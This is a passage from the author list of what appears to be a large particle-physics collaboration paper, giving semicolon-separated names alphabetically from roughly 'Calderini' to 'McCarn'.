Paolo; Calderini, Giovanni; Calfayan, Philippe; Calkins, Robert; Caloba, Luiz; Caloi, Rita; Calvet, David; Calvet, Samuel; Camacho Toro, Reina; Camarri, Paolo; Cambiaghi, Mario; Cameron, David; Campana, Simone; Campanelli, Mario; Canale, Vincenzo; Canelli, Florencia; Canepa, Anadi; Cantero, Josu; Capasso, Luciano; Capeans Garrido, Maria Del Mar; Caprini, Irinel; Caprini, Mihai; Capriotti, Daniele; Capua, Marcella; Caputo, Regina; Caramarcu, Costin; Cardarelli, Roberto; Carli, Tancredi; Carlino, Gianpaolo; Carminati, Leonardo; Caron, Bryan; Caron, Sascha; Carrillo Montoya, German D; Carter, Antony; Carter, Janet; Carvalho, João; Casadei, Diego; Casado, Maria Pilar; Cascella, Michele; Caso, Carlo; Castaneda Hernandez, Alfredo Martin; Castaneda-Miranda, Elizabeth; Castillo Gimenez, Victoria; Castro, Nuno Filipe; Cataldi, Gabriella; Cataneo, Fernando; Catinaccio, Andrea; Catmore, James; Cattai, Ariella; Cattani, Giordano; Caughron, Seth; Cauz, Diego; Cavalleri, Pietro; Cavalli, Donatella; Cavalli-Sforza, Matteo; Cavasinni, Vincenzo; Ceradini, Filippo; Santiago Cerqueira, Augusto; Cerri, Alessandro; Cerrito, Lucio; Cerutti, Fabio; Cetin, Serkant Ali; Cevenini, Francesco; Chafaq, Aziz; Chakraborty, Dhiman; Chan, Kevin; Chapleau, Bertrand; Chapman, John Derek; Chapman, John Wehrley; Chareyre, Eve; Charlton, Dave; Chavda, Vikash; Chavez Barajas, Carlos Alberto; Cheatham, Susan; Chekanov, Sergei; Chekulaev, Sergey; Chelkov, Gueorgui; Chelstowska, Magda Anna; Chen, Chunhui; Chen, Hucheng; Chen, Shenjian; Chen, Tingyang; Chen, Xin; Cheng, Shaochen; Cheplakov, Alexander; Chepurnov, Vladimir; Cherkaoui El Moursli, Rajaa; Chernyatin, Valeriy; Cheu, Elliott; Cheung, Sing-Leung; Chevalier, Laurent; Chiefari, Giovanni; Chikovani, Leila; Childers, John Taylor; Chilingarov, Alexandre; Chiodini, Gabriele; Chizhov, Mihail; Choudalakis, Georgios; Chouridou, Sofia; Christidi, Illectra-Athanasia; Christov, Asen; Chromek-Burckhart, Doris; Chu, Ming-Lee; Chudoba, Jiri; Ciapetti, Guido; Ciba, Krzysztof; Ciftci, Abbas Kenan; Ciftci, Rena; Cinca, Diane; Cindro, Vladimir; Ciobotaru, Matei Dan; Ciocca, Claudia; Ciocio, Alessandra; Cirilli, Manuela; Ciubancan, Mihai; Clark, Allan G; Clark, Philip; Cleland, Bill; Clemens, Jean-Claude; Clement, Benoit; Clement, Christophe; Clifft, Roger; Coadou, Yann; Cobal, Marina; Coccaro, Andrea; Cochran, James H; Coe, Paul; Cogan, Joshua Godfrey; Coggeshall, James; Cogneras, Eric; Cojocaru, Claudiu; Colas, Jacques; Colijn, Auke-Pieter; Collard, Caroline; Collins, Neil; Collins-Tooth, Christopher; Collot, Johann; Colon, German; Conde Muiño, Patricia; Coniavitis, Elias; Conidi, Maria Chiara; Consonni, Michele; Consorti, Valerio; Constantinescu, Serban; Conta, Claudio; Conventi, Francesco; Cook, James; Cooke, Mark; Cooper, Ben; Cooper-Sarkar, Amanda; Cooper-Smith, Neil; Copic, Katherine; Cornelissen, Thijs; Corradi, Massimo; Corriveau, Francois; Cortes-Gonzalez, Arely; Cortiana, Giorgio; Costa, Giuseppe; Costa, María José; Costanzo, Davide; Costin, Tudor; Côté, David; Coura Torres, Rodrigo; Courneyea, Lorraine; Cowan, Glen; Cowden, Christopher; Cox, Brian; Cranmer, Kyle; Crescioli, Francesco; Cristinziani, Markus; Crosetti, Giovanni; Crupi, Roberto; Crépé-Renaudin, Sabine; Cuciuc, Constantin-Mihai; Cuenca Almenar, Cristóbal; Cuhadar Donszelmann, Tulay; Curatolo, Maria; Curtis, Chris; Cwetanski, Peter; Czirr, Hendrik; Czyczula, Zofia; D'Auria, Saverio; D'Onofrio, Monica; D'Orazio, Alessia; Da Silva, Paulo Vitor; Da Via, Cinzia; Dabrowski, Wladyslaw; Dai, Tiesheng; Dallapiccola, Carlo; Dam, Mogens; Dameri, Mauro; Damiani, Daniel; Danielsson, Hans Olof; Dannheim, Dominik; Dao, Valerio; Darbo, Giovanni; Darlea, Georgiana Lavinia; Daum, Cornelis; Dauvergne, Jean-Pierre; Davey, Will; Davidek, Tomas; Davidson, Nadia; Davidson, Ruth; Davies, Eleanor; Davies, Merlin; Davison, Adam; Davygora, Yuriy; Dawe, Edmund; Dawson, Ian; Dawson, John; Daya, Rozmin; De, Kaushik; de Asmundis, Riccardo; De Castro, Stefano; De Castro Faria Salgado, Pedro; De Cecco, Sandro; de Graat, Julien; De Groot, Nicolo; de Jong, Paul; De La Taille, Christophe; De la Torre, Hector; De Lotto, Barbara; De Mora, Lee; De Nooij, Lucie; De Oliveira Branco, Miguel; De Pedis, Daniele; De Salvo, Alessandro; De Sanctis, Umberto; De Santo, Antonella; De Vivie De Regie, Jean-Baptiste; Dean, Simon; Dedovich, Dmitri; Degenhardt, James; Dehchar, Mohamed; Del Papa, Carlo; Del Peso, Jose; Del Prete, Tarcisio; Deliyergiyev, Maksym; Dell'Acqua, Andrea; Dell'Asta, Lidia; Della Pietra, Massimo; della Volpe, Domenico; Delmastro, Marco; Delpierre, Pierre; Delruelle, Nicolas; Delsart, Pierre-Antoine; Deluca, Carolina; Demers, Sarah; Demichev, Mikhail; Demirkoz, Bilge; Deng, Jianrong; Denisov, Sergey; Derendarz, Dominik; Derkaoui, Jamal Eddine; Derue, Frederic; Dervan, Paul; Desch, Klaus Kurt; Devetak, Erik; Deviveiros, Pier-Olivier; Dewhurst, Alastair; DeWilde, Burton; Dhaliwal, Saminder; Dhullipudi, Ramasudhakar; Di Ciaccio, Anna; Di Ciaccio, Lucia; Di Girolamo, Alessandro; Di Girolamo, Beniamino; Di Luise, Silvestro; Di Mattia, Alessandro; Di Micco, Biagio; Di Nardo, Roberto; Di Simone, Andrea; Di Sipio, Riccardo; Diaz, Marco Aurelio; Diblen, Faruk; Diehl, Edward; Dietrich, Janet; Dietzsch, Thorsten; Diglio, Sara; Dindar Yagci, Kamile; Dingfelder, Jochen; Dionisi, Carlo; Dita, Petre; Dita, Sanda; Dittus, Fridolin; Djama, Fares; Djobava, Tamar; Barros do Vale, Maria Aline; Do Valle Wemans, André; Doan, Thi Kieu Oanh; Dobbs, Matt; Dobinson, Robert; Dobos, Daniel; Dobson, Ellie; Dobson, Marc; Dodd, Jeremy; Doglioni, Caterina; Doherty, Tom; Doi, Yoshikuni; Dolejsi, Jiri; Dolenc, Irena; Dolezal, Zdenek; Dolgoshein, Boris; Dohmae, Takeshi; Donadelli, Marisilvia; Donega, Mauro; Donini, Julien; Dopke, Jens; Doria, Alessandra; Dos Anjos, Andre; Dosil, Mireia; Dotti, Andrea; Dova, Maria-Teresa; Dowell, John; Doxiadis, Alexander; Doyle, Tony; Drasal, Zbynek; Drees, Jürgen; Dressnandt, Nandor; Drevermann, Hans; Driouichi, Chafik; Dris, Manolis; Dubbert, Jörg; Dubbs, Tim; Dube, Sourabh; Duchovni, Ehud; Duckeck, Guenter; Dudarev, Alexey; Dudziak, Fanny; Dührssen, Michael; Duerdoth, Ian; Duflot, Laurent; Dufour, Marc-Andre; Dunford, Monica; Duran Yildiz, Hatice; Duxfield, Robert; Dwuznik, Michal; Dydak, Friedrich; Dzahini, Daniel; Düren, Michael; Ebenstein, William; Ebke, Johannes; Eckert, Simon; Eckweiler, Sebastian; Edmonds, Keith; Edwards, Clive; Edwards, Nicholas Charles; Ehrenfeld, Wolfgang; Ehrich, Thies; Eifert, Till; Eigen, Gerald; Einsweiler, Kevin; Eisenhandler, Eric; Ekelof, Tord; El Kacimi, Mohamed; Ellert, Mattias; Elles, Sabine; Ellinghaus, Frank; Ellis, Katherine; Ellis, Nicolas; Elmsheuser, Johannes; Elsing, Markus; Emeliyanov, Dmitry; Engelmann, Roderich; Engl, Albert; Epp, Brigitte; Eppig, Andrew; Erdmann, Johannes; Ereditato, Antonio; Eriksson, Daniel; Ernst, Jesse; Ernst, Michael; Ernwein, Jean; Errede, Deborah; Errede, Steven; Ertel, Eugen; Escalier, Marc; Escobar, Carlos; Espinal Curull, Xavier; Esposito, Bellisario; Etienne, Francois; Etienvre, Anne-Isabelle; Etzion, Erez; Evangelakou, Despoina; Evans, Hal; Fabbri, Laura; Fabre, Caroline; Fakhrutdinov, Rinat; Falciano, Speranza; Fang, Yaquan; Fanti, Marcello; Farbin, Amir; Farilla, Addolorata; Farley, Jason; Farooque, Trisha; Farrington, Sinead; Farthouat, Philippe; Fassnacht, Patrick; Fassouliotis, Dimitrios; Fatholahzadeh, Baharak; Favareto, Andrea; Fayard, Louis; Fazio, Salvatore; Febbraro, Renato; Federic, Pavol; Fedin, Oleg; Fedorko, Woiciech; Fehling-Kaschek, Mirjam; Feligioni, Lorenzo; Fellmann, Denis; Felzmann, Ulrich; Feng, Cunfeng; Feng, Eric; Fenyuk, Alexander; Ferencei, Jozef; Ferland, Jonathan; Fernando, Waruna; Ferrag, Samir; Ferrando, James; Ferrara, Valentina; Ferrari, Arnaud; Ferrari, Pamela; Ferrari, Roberto; Ferrer, Antonio; Ferrer, Maria Lorenza; Ferrere, Didier; Ferretti, Claudio; Ferretto Parodi, Andrea; Fiascaris, Maria; Fiedler, Frank; Filipčič, Andrej; Filippas, Anastasios; Filthaut, Frank; Fincke-Keeler, Margret; Fiolhais, Miguel; Fiorini, Luca; Firan, Ana; Fischer, Gordon; Fischer, Peter; Fisher, Matthew; Fisher, Steve; Flechl, Martin; Fleck, Ivor; Fleckner, Johanna; Fleischmann, Philipp; Fleischmann, Sebastian; Flick, Tobias; Flores Castillo, Luis; Flowerdew, Michael; Fokitis, Manolis; Fonseca Martin, Teresa; Forbush, David Alan; Formica, Andrea; Forti, Alessandra; Fortin, Dominique; Foster, Joe; Fournier, Daniel; Foussat, Arnaud; Fowler, Andrew; Fowler, Ken; Fox, Harald; Francavilla, Paolo; Franchino, Silvia; Francis, David; Frank, Tal; Franklin, Melissa; Franz, Sebastien; Fraternali, Marco; Fratina, Sasa; French, Sky; Friedrich, Felix; Froeschl, Robert; Froidevaux, Daniel; Frost, James; Fukunaga, Chikara; Fullana Torregrosa, Esteban; Fuster, Juan; Gabaldon, Carolina; Gabizon, Ofir; Gadfort, Thomas; Gadomski, Szymon; Gagliardi, Guido; Gagnon, Pauline; Galea, Cristina; Gallas, Elizabeth; Gallas, Manuel; Gallo, Valentina Santina; Gallop, Bruce; Gallus, Petr; Galyaev, Eugene; Gan, KK; Gao, Yongsheng; Gapienko, Vladimir; Gaponenko, Andrei; Garberson, Ford; Garcia-Sciveres, Maurice; García, Carmen; García Navarro, José Enrique; Gardner, Robert; Garelli, Nicoletta; Garitaonandia, Hegoi; Garonne, Vincent; Garvey, John; Gatti, Claudio; Gaudio, Gabriella; Gaumer, Olivier; Gaur, Bakul; Gauthier, Lea; Gavrilenko, Igor; Gay, Colin; Gaycken, Goetz; Gayde, Jean-Christophe; Gazis, Evangelos; Ge, Peng; Gee, Norman; Geerts, Daniël Alphonsus Adrianus; Geich-Gimbel, Christoph; Gellerstedt, Karl; Gemme, Claudia; Gemmell, Alistair; Genest, Marie-Hélène; Gentile, Simonetta; George, Matthias; George, Simon; Gerlach, Peter; Gershon, Avi; Geweniger, Christoph; Ghazlane, Hamid; Ghez, Philippe; Ghodbane, Nabil; Giacobbe, Benedetto; Giagu, Stefano; Giakoumopoulou, Victoria; Giangiobbe, Vincent; Gianotti, Fabiola; Gibbard, Bruce; Gibson, Adam; Gibson, Stephen; Gilbert, Laura; Gilchriese, Murdock; Gilewsky, Valentin; Gillberg, Dag; Gillman, Tony; Gingrich, Douglas; Ginzburg, Jonatan; Giokaris, Nikos; Giordano, Raffaele; Giorgi, Francesco Michelangelo; Giovannini, Paola; Giraud, Pierre-Francois; Giugni, Danilo; Giunta, Michele; Giusti, Paolo; Gjelsten, Børge Kile; Gladilin, Leonid; Glasman, Claudia; Glatzer, Julian; Glazov, Alexandre; Glitza, Karl-Walter; Glonti, George; Godfrey, Jennifer; Godlewski, Jan; Goebel, Martin; Göpfert, Thomas; Goeringer, Christian; Gössling, Claus; Göttfert, Tobias; Goldfarb, Steven; Goldin, Daniel; Golling, Tobias; Golovnia, Serguei; Gomes, Agostinho; Gomez Fajardo, Luz Stella; Gonçalo, Ricardo; Goncalves Pinto Firmino Da Costa, Joao; Gonella, Laura; Gonidec, Allain; Gonzalez, Saul; González de la Hoz, Santiago; Gonzalez Silva, Laura; Gonzalez-Sevilla, Sergio; Goodson, Jeremiah Jet; Goossens, Luc; Gorbounov, Petr Andreevich; Gordon, Howard; Gorelov, Igor; Gorfine, Grant; Gorini, Benedetto; Gorini, Edoardo; Gorišek, Andrej; Gornicki, Edward; Gorokhov, Serguei; Goryachev, Vladimir; Gosdzik, Bjoern; Gosselink, Martijn; Gostkin, Mikhail Ivanovitch; Gough Eschrich, Ivo; Gouighri, Mohamed; Goujdami, Driss; Goulette, Marc Phillippe; Goussiou, Anna; Goy, Corinne; Grabowska-Bold, Iwona; Grabski, Varlen; Grafström, Per; Grah, Christian; Grahn, Karl-Johan; Grancagnolo, Francesco; Grancagnolo, Sergio; Grassi, Valerio; Gratchev, Vadim; Grau, Nathan; Gray, Heather; Gray, Julia Ann; Graziani, Enrico; Grebenyuk, Oleg; Greenfield, Debbie; Greenshaw, Timothy; Greenwood, Zeno Dixon; Gregersen, Kristian; Gregor, Ingrid-Maria; Grenier, Philippe; Griffiths, Justin; Grigalashvili, Nugzar; Grillo, Alexander; Grinstein, Sebastian; Grishkevich, Yaroslav; Grivaz, Jean-Francois; Grognuz, Joel; Groh, Manfred; Gross, Eilam; Grosse-Knetter, Joern; Groth-Jensen, Jacob; Grybel, Kai; Guarino, Victor; Guest, Daniel; Guicheney, Christophe; Guida, Angelo; Guillemin, Thibault; Guindon, Stefan; Guler, Hulya; Gunther, Jaroslav; Guo, Bin; Guo, Jun; Gupta, Ambreesh; Gusakov, Yury; Gushchin, Vladimir; Gutierrez, Andrea; Gutierrez, Phillip; Guttman, Nir; Gutzwiller, Olivier; Guyot, Claude; Gwenlan, Claire; Gwilliam, Carl; Haas, Andy; Haas, Stefan; Haber, Carl; Hackenburg, Robert; Hadavand, Haleh Khani; Hadley, David; Haefner, Petra; Hahn, Ferdinand; Haider, Stefan; Hajduk, Zbigniew; Hakobyan, Hrachya; Haller, Johannes; Hamacher, Klaus; Hamal, Petr; Hamilton, Andrew; Hamilton, Samuel; Han, Hongguang; Han, Liang; Hanagaki, Kazunori; Hance, Michael; Handel, Carsten; Hanke, Paul; Hansen, John Renner; Hansen, Jørgen Beck; Hansen, Jorn Dines; Hansen, Peter Henrik; Hansson, Per; Hara, Kazuhiko; Hare, Gabriel; Harenberg, Torsten; Harkusha, Siarhei; Harper, Devin; Harrington, Robert; Harris, Orin; Harrison, Karl; Hartert, Jochen; Hartjes, Fred; Haruyama, Tomiyoshi; Harvey, Alex; Hasegawa, Satoshi; Hasegawa, Yoji; Hassani, Samira; Hatch, Mark; Hauff, Dieter; Haug, Sigve; Hauschild, Michael; Hauser, Reiner; Havranek, Miroslav; Hawes, Brian; Hawkes, Christopher; Hawkings, Richard John; Hawkins, Donovan; Hayakawa, Takashi; Hayden, Daniel; Hayward, Helen; Haywood, Stephen; Hazen, Eric; He, Mao; Head, Simon; Hedberg, Vincent; Heelan, Louise; Heim, Sarah; Heinemann, Beate; Heisterkamp, Simon; Helary, Louis; Heller, Mathieu; Hellman, Sten; Hellmich, Dennis; Helsens, Clement; Henderson, Robert; Henke, Michael; Henrichs, Anna; Henriques Correia, Ana Maria; Henrot-Versille, Sophie; Henry-Couannier, Frédéric; Hensel, Carsten; Henß, Tobias; Medina Hernandez, Carlos; Hernández Jiménez, Yesenia; Herrberg, Ruth; Hershenhorn, Alon David; Herten, Gregor; Hertenberger, Ralf; Hervas, Luis; Hessey, Nigel; Hidvegi, Attila; Higón-Rodriguez, Emilio; Hill, Daniel; Hill, John; Hill, Norman; Hiller, Karl Heinz; Hillert, Sonja; Hillier, Stephen; Hinchliffe, Ian; Hines, Elizabeth; Hirose, Minoru; Hirsch, Florian; Hirschbuehl, Dominic; Hobbs, John; Hod, Noam; Hodgkinson, Mark; Hodgson, Paul; Hoecker, Andreas; Hoeferkamp, Martin; Hoffman, Julia; Hoffmann, Dirk; Hohlfeld, Marc; Holder, Martin; Holmgren, Sven-Olof; Holy, Tomas; Holzbauer, Jenny; Homma, Yasuhiro; Hong, Tae Min; Hooft van Huysduynen, Loek; Horazdovsky, Tomas; Horn, Claus; Horner, Stephan; Horton, Katherine; Hostachy, Jean-Yves; Hou, Suen; Houlden, Michael; Hoummada, Abdeslam; Howarth, James; Howell, David; Hristova, Ivana; Hrivnac, Julius; Hruska, Ivan; Hryn'ova, Tetiana; Hsu, Pai-hsien Jennifer; Hsu, Shih-Chieh; Huang, Guang Shun; Hubacek, Zdenek; Hubaut, Fabrice; Huegging, Fabian; Huffman, Todd Brian; Hughes, Emlyn; Hughes, Gareth; Hughes-Jones, Richard; Huhtinen, Mika; Hurst, Peter; Hurwitz, Martina; Husemann, Ulrich; Huseynov, Nazim; Huston, Joey; Huth, John; Iacobucci, Giuseppe; Iakovidis, Georgios; Ibbotson, Michael; Ibragimov, Iskander; Ichimiya, Ryo; Iconomidou-Fayard, Lydia; Idarraga, John; Idzik, Marek; Iengo, Paolo; Igonkina, Olga; Ikegami, Yoichi; Ikeno, Masahiro; Ilchenko, Yuri; Iliadis, Dimitrios; Imbault, Didier; Imhaeuser, Martin; Imori, Masatoshi; Ince, Tayfun; Inigo-Golfin, Joaquin; Ioannou, Pavlos; Iodice, Mauro; Ionescu, Gelu; Irles Quiles, Adrian; Ishii, Koji; Ishikawa, Akimasa; Ishino, Masaya; Ishmukhametov, Renat; Issever, Cigdem; Istin, Serhat; Ivashin, Anton; Iwanski, Wieslaw; Iwasaki, Hiroyuki; Izen, Joseph; Izzo, Vincenzo; Jackson, Brett; Jackson, John; Jackson, Paul; Jaekel, Martin; Jain, Vivek; Jakobs, Karl; Jakobsen, Sune; Jakubek, Jan; Jana, Dilip; Jankowski, Ernest; Jansen, Eric; Jantsch, Andreas; Janus, Michel; Jarlskog, Göran; Jeanty, Laura; Jelen, Kazimierz; Jen-La Plante, Imai; Jenni, Peter; Jeremie, Andrea; Jež, Pavel; Jézéquel, Stéphane; Jha, Manoj Kumar; Ji, Haoshuang; Ji, Weina; Jia, Jiangyong; Jiang, Yi; Jimenez Belenguer, Marcos; Jin, Ge; Jin, Shan; Jinnouchi, Osamu; Joergensen, Morten Dam; Joffe, David; Johansen, Lars; Johansen, Marianne; Johansson, Erik; Johansson, Per; Johnert, Sebastian; Johns, Kenneth; Jon-And, Kerstin; Jones, Graham; Jones, Roger; Jones, Tegid; Jones, Tim; Jonsson, Ove; Joram, Christian; Jorge, Pedro; Joseph, John; Jovin, Tatjana; Ju, Xiangyang; Juranek, Vojtech; Jussel, Patrick; Juste Rozas, Aurelio; Kabachenko, Vasily; Kabana, Sonja; Kaci, Mohammed; Kaczmarska, Anna; Kadlecik, Peter; Kado, Marumi; Kagan, Harris; Kagan, Michael; Kaiser, Steffen; Kajomovitz, Enrique; Kalinin, Sergey; Kalinovskaya, Lidia; Kama, Sami; Kanaya, Naoko; Kaneda, Michiru; Kanno, Takayuki; Kantserov, Vadim; Kanzaki, Junichi; Kaplan, Benjamin; Kapliy, Anton; Kaplon, Jan; Kar, Deepak; Karagoz, Muge; Karnevskiy, Mikhail; Karr, Kristo; Kartvelishvili, Vakhtang; Karyukhin, Andrey; Kashif, Lashkar; Kasmi, Azzedine; Kass, Richard; Kastanas, Alex; Kataoka, Mayuko; Kataoka, Yousuke; Katsoufis, Elias; Katzy, Judith; Kaushik, Venkatesh; Kawagoe, Kiyotomo; Kawamoto, Tatsuo; Kawamura, Gen; Kayl, Manuel; Kazanin, Vassili; Kazarinov, Makhail; Keates, James Robert; Keeler, Richard; Kehoe, Robert; Keil, Markus; Kekelidze, George; Kelly, Marc; Kennedy, John; Kenney, Christopher John; Kenyon, Mike; Kepka, Oldrich; Kerschen, Nicolas; Kerševan, Borut Paul; Kersten, Susanne; Kessoku, Kohei; Ketterer, Christian; Keung, Justin; Khakzad, Mohsen; Khalil-zada, Farkhad; Khandanyan, Hovhannes; Khanov, Alexander; Kharchenko, Dmitri; Khodinov, Alexander; Kholodenko, Anatoli; Khomich, Andrei; Khoo, Teng Jian; Khoriauli, Gia; Khoroshilov, Andrey; Khovanskiy, Nikolai; Khovanskiy, Valery; Khramov, Evgeniy; Khubua, Jemal; Kim, Hyeon Jin; Kim, Min Suk; Kim, Peter; Kim, Shinhong; Kimura, Naoki; Kind, Oliver; King, Barry; King, Matthew; King, Robert Steven Beaufoy; Kirk, Julie; Kirsch, Guillaume; Kirsch, Lawrence; Kiryunin, Andrey; Kishimoto, Tomoe; Kisielewska, Danuta; Kittelmann, Thomas; Kiver, Andrey; Kiyamura, Hironori; Kladiva, Eduard; Klaiber-Lodewigs, Jonas; Klein, Max; Klein, Uta; Kleinknecht, Konrad; Klemetti, Miika; Klier, Amit; Klimentov, Alexei; Klingenberg, Reiner; Klinkby, Esben; Klioutchnikova, Tatiana; Klok, Peter; Klous, Sander; Kluge, Eike-Erik; Kluge, Thomas; Kluit, Peter; Kluth, Stefan; Knecht, Neil; Kneringer, Emmerich; Knobloch, Juergen; Knoops, Edith; Knue, Andrea; Ko, Byeong Rok; Kobayashi, Tomio; Kobel, Michael; Kocian, Martin; Kocnar, Antonin; Kodys, Peter; Köneke, Karsten; König, Adriaan; Koenig, Sebastian; Köpke, Lutz; Koetsveld, Folkert; Koevesarki, Peter; Koffas, Thomas; Koffeman, Els; Kohn, Fabian; Kohout, Zdenek; Kohriki, Takashi; Koi, Tatsumi; Kokott, Thomas; Kolachev, Guennady; Kolanoski, Hermann; Kolesnikov, Vladimir; Koletsou, Iro; Koll, James; Kollar, Daniel; Kollefrath, Michael; Kolya, Scott; Komar, Aston; Komaragiri, Jyothsna Rani; Komori, Yuto; Kondo, Takahiko; Kono, Takanori; Kononov, Anatoly; Konoplich, Rostislav; Konstantinidis, Nikolaos; Kootz, Andreas; Koperny, Stefan; Kopikov, Sergey; Korcyl, Krzysztof; Kordas, Kostantinos; Koreshev, Victor; Korn, Andreas; Korol, Aleksandr; Korolkov, Ilya; Korolkova, Elena; Korotkov, Vladislav; Kortner, Oliver; Kortner, Sandra; Kostyukhin, Vadim; Kotamäki, Miikka Juhani; Kotov, Sergey; Kotov, Vladislav; Kotwal, Ashutosh; Kourkoumelis, Christine; Kouskoura, Vasiliki; Koutsman, Alex; Kowalewski, Robert Victor; Kowalski, Tadeusz; Kozanecki, Witold; Kozhin, Anatoly; Kral, Vlastimil; Kramarenko, Viktor; Kramberger, Gregor; Krasny, Mieczyslaw Witold; Krasznahorkay, Attila; Kraus, James; Kreisel, Arik; Krejci, Frantisek; Kretzschmar, Jan; Krieger, Nina; Krieger, Peter; Kroeninger, Kevin; Kroha, Hubert; Kroll, Joe; Kroseberg, Juergen; Krstic, Jelena; Kruchonak, Uladzimir; Krüger, Hans; Kruker, Tobias; Krumshteyn, Zinovii; Kruth, Andre; Kubota, Takashi; Kuehn, Susanne; Kugel, Andreas; Kuhl, Thorsten; Kuhn, Dietmar; Kukhtin, Victor; Kulchitsky, Yuri; Kuleshov, Sergey; Kummer, Christian; Kuna, Marine; Kundu, Nikhil; Kunkle, Joshua; Kupco, Alexander; Kurashige, Hisaya; Kurata, Masakazu; Kurochkin, Yurii; Kus, Vlastimil; Kuykendall, William; Kuze, Masahiro; Kuzhir, Polina; Kvita, Jiri; Kwee, Regina; La Rosa, Alessandro; La Rotonda, Laura; Labarga, Luis; Labbe, Julien; Lablak, Said; Lacasta, Carlos; Lacava, Francesco; Lacker, Heiko; Lacour, Didier; Lacuesta, Vicente Ramón; Ladygin, Evgueni; Lafaye, Rémi; Laforge, Bertrand; Lagouri, Theodota; Lai, Stanley; Laisne, Emmanuel; Lamanna, Massimo; Lampen, Caleb; Lampl, Walter; Lancon, Eric; Landgraf, Ulrich; Landon, Murrough; Landsman, Hagar; Lane, Jenna; Lange, Clemens; Lankford, Andrew; Lanni, Francesco; Lantzsch, Kerstin; Laplace, Sandrine; Lapoire, Cecile; Laporte, Jean-Francois; Lari, Tommaso; Larionov, Anatoly; Larner, Aimee; Lasseur, Christian; Lassnig, Mario; Laurelli, Paolo; Lavorato, Antonia; Lavrijsen, Wim; Laycock, Paul; Lazarev, Alexandre; Le Dortz, Olivier; Le Guirriec, Emmanuel; Le Maner, Christophe; Le Menedeu, Eve; Lebel, Céline; LeCompte, Thomas; Ledroit-Guillon, Fabienne Agnes Marie; Lee, Hurng-Chun; Lee, Jason; Lee, Shih-Chang; Lee, Lawrence; Lefebvre, Michel; Legendre, Marie; Leger, Annie; LeGeyt, Benjamin; Legger, Federica; Leggett, Charles; Lehmacher, Marc; Lehmann Miotto, Giovanna; Lei, Xiaowen; Leite, Marco Aurelio Lisboa; Leitner, Rupert; Lellouch, Daniel; Leltchouk, Mikhail; Lemmer, Boris; Lendermann, Victor; Leney, Katharine; Lenz, Tatiana; Lenzen, Georg; Lenzi, Bruno; Leonhardt, Kathrin; Leontsinis, Stefanos; Leroy, Claude; Lessard, Jean-Raphael; Lesser, Jonas; Lester, Christopher; Leung Fook Cheong, Annabelle; Levêque, Jessica; Levin, Daniel; Levinson, Lorne; Levitski, Mikhail; Lewandowska, Marta; Lewis, Adrian; Lewis, George; Leyko, Agnieszka; Leyton, Michael; Li, Bo; Li, Haifeng; Li, Shu; Li, Xuefei; Liang, Zhihua; Liang, Zhijun; Liberti, Barbara; Lichard, Peter; Lichtnecker, Markus; Lie, Ki; Liebig, Wolfgang; Lifshitz, Ronen; Lilley, Joseph; Limbach, Christian; Limosani, Antonio; Limper, Maaike; Lin, Simon; Linde, Frank; Linnemann, James; Lipeles, Elliot; Lipinsky, Lukas; Lipniacka, Anna; Liss, Tony; Lissauer, David; Lister, Alison; Litke, Alan; Liu, Chuanlei; Liu, Dong; Liu, Hao; Liu, Jianbei; Liu, Minghui; Liu, Shengli; Liu, Yanwen; Livan, Michele; Livermore, Sarah; Lleres, Annick; Llorente Merino, Javier; Lloyd, Stephen; Lobodzinska, Ewelina; Loch, Peter; Lockman, William; Lockwitz, Sarah; Loddenkoetter, Thomas; Loebinger, Fred; Loginov, Andrey; Loh, Chang Wei; Lohse, Thomas; Lohwasser, Kristin; Lokajicek, Milos; Loken, James; Lombardo, Vincenzo Paolo; Long, Robin Eamonn; Lopes, Lourenco; Lopez Mateos, David; Losada, Marta; Loscutoff, Peter; Lo Sterzo, Francesco; Losty, Michael; Lou, Xinchou; Lounis, Abdenour; Loureiro, Karina; Love, Jeremy; Love, Peter; Lowe, Andrew; Lu, Feng; Lubatti, Henry; Luci, Claudio; Lucotte, Arnaud; Ludwig, Andreas; Ludwig, Dörthe; Ludwig, Inga; Ludwig, Jens; Luehring, Frederick; Luijckx, Guy; Lumb, Debra; Luminari, Lamberto; Lund, Esben; Lund-Jensen, Bengt; Lundberg, Björn; Lundberg, Johan; Lundquist, Johan; Lungwitz, Matthias; Lupi, Anna; Lutz, Gerhard; Lynn, David; Lys, Jeremy; Lytken, Else; Ma, Hong; Ma, Lian Liang; Macana Goia, Jorge Andres; Maccarrone, Giovanni; Macchiolo, Anna; Maček, Boštjan; Machado Miguens, Joana; Mackeprang, Rasmus; Madaras, Ronald; Mader, Wolfgang; Maenner, Reinhard; Maeno, Tadashi; Mättig, Peter; Mättig, Stefan; Magalhaes Martins, Paulo Jorge; Magnoni, Luca; Magradze, Erekle; Mahalalel, Yair; Mahboubi, Kambiz; Mahout, Gilles; Maiani, Camilla; Maidantchik, Carmen; Maio, Amélia; Majewski, Stephanie; Makida, Yasuhiro; Makovec, Nikola; Mal, Prolay; Malecki, Pawel; Malecki, Piotr; Maleev, Victor; Malek, Fairouz; Mallik, Usha; Malon, David; Maltezos, Stavros; Malyshev, Vladimir; Malyukov, Sergei; Mameghani, Raphael; Mamuzic, Judita; Manabe, Atsushi; Mandelli, Luciano; Mandić, Igor; Mandrysch, Rocco; Maneira, José; Mangeard, Pierre-Simon; Manjavidze, Ioseb; Mann, Alexander; Manning, Peter; Manousakis-Katsikakis, Arkadios; Mansoulie, Bruno; Manz, Andreas; Mapelli, Alessandro; Mapelli, Livio; March, Luis; Marchand, Jean-Francois; Marchese, Fabrizio; Marchiori, Giovanni; Marcisovsky, Michal; Marin, Alexandru; Marino, Christopher; Marroquim, Fernando; Marshall, Robin; Marshall, Zach; Martens, Kalen; Marti-Garcia, Salvador; Martin, Andrew; Martin, Brian; Martin, Brian Thomas; Martin, Franck Francois; Martin, Jean-Pierre; Martin, Philippe; Martin, Tim; Martin dit Latour, Bertrand; Martin–Haugh, Stewart; Martinez, Mario; Martinez Outschoorn, Verena; Martyniuk, Alex; Marx, Marilyn; Marzano, Francesco; Marzin, Antoine; Masetti, Lucia; Mashimo, Tetsuro; Mashinistov, Ruslan; Masik, Jiri; Maslennikov, Alexey; Massa, Ignazio; Massaro, Graziano; Massol, Nicolas; Mastrandrea, Paolo; Mastroberardino, Anna; Masubuchi, Tatsuya; Mathes, Markus; Matricon, Pierre; Matsumoto, Hiroshi; Matsunaga, Hiroyuki; Matsushita, Takashi; Mattravers, Carly; Maugain, Jean-Marie; Maurer, Julien; Maxfield, Stephen; Maximov, Dmitriy; May, Edward; Mayne, Anna; Mazini, Rachid; Mazur, Michael; Mazzanti, Marcello; Mazzoni, Enrico; Mc Kee, Shawn Patrick; McCarn, 